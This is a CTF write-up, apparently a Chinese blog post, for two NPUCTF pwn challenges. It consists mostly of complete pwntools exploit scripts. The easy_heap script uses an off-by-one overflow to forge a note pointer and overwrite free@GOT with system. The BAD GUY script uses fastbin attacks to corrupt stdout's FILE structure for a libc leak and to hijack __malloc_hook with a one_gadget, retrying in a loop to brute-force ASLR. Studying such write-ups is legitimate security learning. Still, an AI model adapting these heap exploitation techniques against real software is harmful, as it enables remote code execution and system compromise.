NPUCTF pwn

題目質量很高萌新直接自閉
這兩道題都挺基礎的

easy_heap

exp:
off-by-one (單字節溢出) 改寫了相鄰 chunk 的 size 字段, 造成 chunk 重疊; 借此偽造 note 的描述符指針, 就得到了任意地址讀 (洩露 libc) 和任意地址寫 (改 GOT)

#!/usr/bin/python2
from pwn import *
# Global tube handle.  pwn() replaces this placeholder with the process()/remote()
# object so the connection outlives the function (e.g. for interactive()).
p=0
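def pwn(host='ha1cyon-ctf.fun', port=30179, local=False, libc_path=None):
    """Run the easy_heap exploit and drop into an interactive shell.

    The note service exposes add/edit/show/delete.  edit() writes one byte
    past the note buffer, which lands on the size field of the following
    chunk.  The overlapping chunk that results is used to forge a note
    descriptor whose data pointer is free@GOT: show() then gives an
    arbitrary read (libc leak) and edit() an arbitrary write (GOT overwrite).

    host, port: remote target, used unless ``local`` is true.
    local:      spawn ./pwn with process() instead of connecting out.
    libc_path:  path to the target's libc.  Defaults to elf.libc, i.e. the
                libc of the *local* loader; the free/system offsets are read
                from this file, so that default is only right when the local
                build matches the remote one — pass the challenge libc
                otherwise.
    Returns None.  Leaves the global ``p`` pointing at the open tube.

    Python 2 only: the payloads mix str and p64() output, which is a
    TypeError under Python 3.
    """
    global p
    if local:
        p = process('./pwn')
    else:
        p = remote(host, port)
    elf = ELF('./pwn')
    libc = ELF(libc_path) if libc_path else elf.libc

    def sla(prompt, data):
        p.sendlineafter('%s' % (prompt), data)

    def sda(prompt, data):
        p.sendafter('%s' % (prompt), data)

    # Menu wrappers.  The prompts are matched very loosely (' :' / ':'), so
    # any change to the binary's menu text breaks the whole script.
    def add(size, data):
        sla(' :', '1')
        sla(' : ', str(size))
        sla(':', data)

    def edit(idx, data):
        sla(' :', '2')
        sla(' :', str(idx))
        sda(': ', data)

    def show(idx):
        sla(' :', '3')
        sla(' :', str(idx))

    def delete(idx):
        sla(' :', '4')
        sla(' :', str(idx))

    # --- heap layout ---------------------------------------------------
    add(0x18, '\x02' * 2)        # note 0: source of the overflow
    add(0x18, '\x03' * 3)        # note 1: the chunk whose size gets corrupted
    add(0x18, '/bin/sh\x00')     # note 2: freeing it later becomes system("/bin/sh")

    # Off-by-one: the 0x19th byte written to note 0 is the low byte of the
    # next chunk's size field, growing it from 0x21 to 0x41 so it now spans
    # note 1's memory and the chunk after it.
    edit(0, 'a' * 0x18 + '\x41')
    delete(1)                    # the oversized chunk lands in the 0x40 bin

    # Reclaim it with a 0x40-byte allocation.  0x10 bytes of filler, then a
    # fake header (prev_size 0, size 0x21) rebuilt where the original one
    # was, then 16 bytes {size=0x100, ptr=free@got} that land in the chunk
    # the service just reused as note 1's descriptor.
    # NOTE(review): this assumes each note is a {size, data_ptr} descriptor
    # chunk followed by its data chunk — inferred from the offsets and from
    # how show/edit on index 1 behave below; confirm against the binary.
    payload = 'a' * 0x10 + p64(0) + p64(0x21) + p64(0x100) + p64(elf.got['free'])
    add(0x38, payload)

    # Arbitrary read: showing note 1 now dumps the GOT entry of free.
    # Take the first 6-byte pointer that ends in 0x7f.
    show(1)
    leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    libcbase = leak - libc.sym['free']
    system = libcbase + libc.sym['system']

    # Arbitrary write: editing note 1 writes through the forged pointer,
    # replacing free@got with system.  Freeing note 2 then runs
    # system("/bin/sh").
    edit(1, p64(system))
    delete(2)
    p.interactive()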

if __name__=="__main__":
	# Single attempt: unlike the BAD GUY exploit below, nothing here depends
	# on guessing ASLR bits, so a retry loop is not needed.
	pwn()

BAD GUY

先用 fastbin attack 把 stdout 的 IO 結構體 (_flags 改成 0xfbad3c80, 清掉 _IO_write_base 低字節) 改掉, 讓它在刷新時洩露 libc 地址; 之後再做一次常規的 fastbin attack, 把 __malloc_hook / __realloc_hook 劫持到 one_gadget. 注意第一步只能部分覆寫 fd 的 2 個字節, 要猜 ASLR 的 4 bit, 所以外層用 while 循環不斷重連重試.
exp:

from pwn import *
# Global tube handle.  pwn() replaces this placeholder with the process()/remote()
# object; __main__ reads it to close the tube after a failed attempt.
p=0
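def pwn(ip, port, debug):
    """Run the BAD GUY exploit once and drop into an interactive shell.

    Two fastbin attacks on a note service with an 8-byte heap overflow in
    edit():

    1. A 0x70 chunk's fd (pointing into main_arena after an unsorted-bin
       split) is partially overwritten to a fake chunk inside stdout's
       _IO_FILE; the next 0x70 allocations let us rewrite stdout's flags and
       read pointers so the next flush leaks libc memory.
    2. With libc base known, a second 0x70 fd is pointed at
       __malloc_hook-0x23 and the hooks are overwritten with a one_gadget.

    ip, port: remote target, used when ``debug`` != 1.
    debug:    1 runs ./pwn1 locally with process(); anything else connects
              to ip:port.
    Returns True after interactive() ends.  Raises whatever pwntools raises
    (EOFError / timeout) when the ASLR guess in step 1 is wrong — the caller
    is expected to retry, since the guess succeeds about 1 time in 16.

    Python 2 only: '\\xdd\\x25' would be UTF-8-encoded to three bytes under
    Python 3, and bytes.ljust(8, '\\x00') would raise — port with b'' literals.
    """
    global p
    if debug == 1:
        p = process('./pwn1')
    else:
        p = remote(ip, port)
    elf = ELF('./pwn1')
    # Local loader's libc.  __malloc_hook / __libc_realloc offsets are read
    # from it, while the leak offset below is hard-coded for the target's
    # build — both must describe the same libc for the exploit to work.
    libc = elf.libc

    def sla(prompt, data):
        p.sendlineafter('%s' % (prompt), data)

    def sda(prompt, data):
        p.sendafter('%s' % (prompt), data)

    # Menu wrappers; prompts are matched loosely, so menu-text changes break
    # the script.
    def add(idx, size, data):
        sla('>> ', '1')
        sla(' :', str(idx))
        sla(': ', str(size))
        sda(':', data)

    def edit(idx, size, data):
        sla('>> ', '2')
        sla(' :', str(idx))
        sla(': ', str(size))
        sda(': ', data)

    def delete(idx):
        sla('>> ', '3')
        sla(' :', str(idx))

    # --- heap grooming -------------------------------------------------
    add(0, 0x18, '\x02' * 2)     # overflow source for the first attack
    add(1, 0x28, '\x03' * 3)     # 0x30 chunk whose size gets inflated
    add(2, 0x68, '\x04' * 4)     # 0x70 chunk that chunk 1 will swallow
    add(3, 0x18, '\x05' * 5)     # overflow source for the second attack
    add(4, 0x68, '\x06' * 6)     # 0x70 chunk used by the second attack
    add(5, 0x28, '\x07' * 7)     # keeps the chunks above away from top

    # Overflow note 0 by 8 bytes: chunk 1's size 0x31 -> 0xa1, so it now
    # covers chunk 1 (0x30) and chunk 2 (0x70).
    payload = 'a' * 0x18 + p64(0xa1)
    edit(0, len(payload), payload)
    delete(1)   # 0xa0 exceeds the default fastbin limit: unsorted bin
    delete(2)   # 0x70 chunk -> fastbin[0x70]
    # Carving 0x30 out of the unsorted chunk leaves a 0x70 remainder exactly
    # on top of chunk 2; the split writes main_arena pointers into its fd/bk,
    # clobbering the fastbin fd we are about to edit.
    add(1, 0x28, '\x08' * 8)

    # Partial overwrite of chunk 2's fd: keep the size byte at 0x71 and
    # replace the two low bytes of the main_arena pointer.  On the target's
    # libc this appears to be the usual stdout-leak fake chunk at
    # _IO_2_1_stdout_-0x43, whose "size" byte is read from stdout's _flags
    # (verify the constant for any other libc).  Only the low 12 bits of a
    # libc address are fixed; the next nibble is ASLR, so '\x25' encodes a
    # 1-in-16 guess — the reason __main__ loops.
    payload = 'a' * 0x20 + p64(0) + p64(0x71) + '\xdd\x25'
    edit(1, len(payload), payload)
    add(6, 0x68, 'dd')   # pops chunk 2; fastbin[0x70] head is now the fake chunk
    # This 0x70 allocation returns memory inside stdout.  0x33 bytes of
    # padding reach _flags; 0xfbad3c80, three zeroed read pointers and a
    # zeroed low byte of _IO_write_base make the next flush emit memory from
    # below the normal write position, which holds libc pointers.
    add(7, 0x68, '\x00' * 0x33 + p64(0xfbad3c80) + 3 * p64(0) + p8(0))

    # Take the first 6-byte pointer ending in 0x7f from the flushed data.
    # Its distance from libc base, 0x3c5600, is specific to the target's
    # libc build (as are the one_gadget offsets, which look like the common
    # glibc 2.23 / Ubuntu 16.04 set) — recompute both for any other libc.
    leak_offset = 3954176  # 0x3c5600
    libcbase = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - leak_offset
    one_gadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_gadget = libcbase + one_gadgets[1]
    malloc_hook = libcbase + libc.sym['__malloc_hook']
    realloc = libcbase + libc.sym['__libc_realloc']

    # --- second fastbin attack: the malloc/realloc hooks -----------------
    delete(4)   # 0x70 chunk -> fastbin[0x70]
    # Overflow note 3 into chunk 4's header: keep size 0x71, point fd at the
    # fake chunk at __malloc_hook-0x23 (its size byte is the 0x7f of the
    # pointer stored just above the hook — the standard trick).
    payload = 'a' * 0x18 + p64(0x71) + p64(malloc_hook - 0x23)
    edit(3, len(payload), payload)
    log.success('libcbase: ' + hex(libcbase))
    add(2, 0x68, 'dodou')   # pops chunk 4; fastbin head is now the fake chunk
    # The fake chunk's user data starts at __malloc_hook-0x13: 11 bytes of
    # padding, then __malloc_hook-8 (presumably __realloc_hook, which sits
    # directly below __malloc_hook) = one_gadget, then __malloc_hook =
    # realloc+9.  Entering realloc past its first pushes adjusts the stack
    # so the one_gadget's constraint is met — the usual reason for the +9.
    add(8, 0x68, 'a' * 11 + p64(one_gadget) + p64(realloc + 9))
    # Any further malloc fires the hook chain.  Send a raw add request and
    # do not wait for the data prompt: the shell appears instead.
    sla('>> ', '1')
    sla(' :', str(10))
    sla(': ', str(2))
    p.interactive()
    return True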

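if __name__ == '__main__':
    # The 2-byte partial overwrite in pwn() guesses one ASLR nibble, so a
    # single run succeeds only about 1 time in 16; reconnect until it does.
    # Deliberately unbounded, as before — stop it with ^C (KeyboardInterrupt
    # is not an Exception and is not swallowed below).
    attempt = 0
    while 1:
        attempt += 1
        try:
            if pwn('ha1cyon-ctf.fun', 30215, 0):
                break
        except Exception as e:
            # A wrong guess normally shows up as EOF / timeout on the tube.
            log.warning('attempt %d failed: %r' % (attempt, e))
            # p is still the int placeholder if remote() itself raised, so
            # only close a real tube instead of crashing with AttributeError.
            if p != 0:
                p.close()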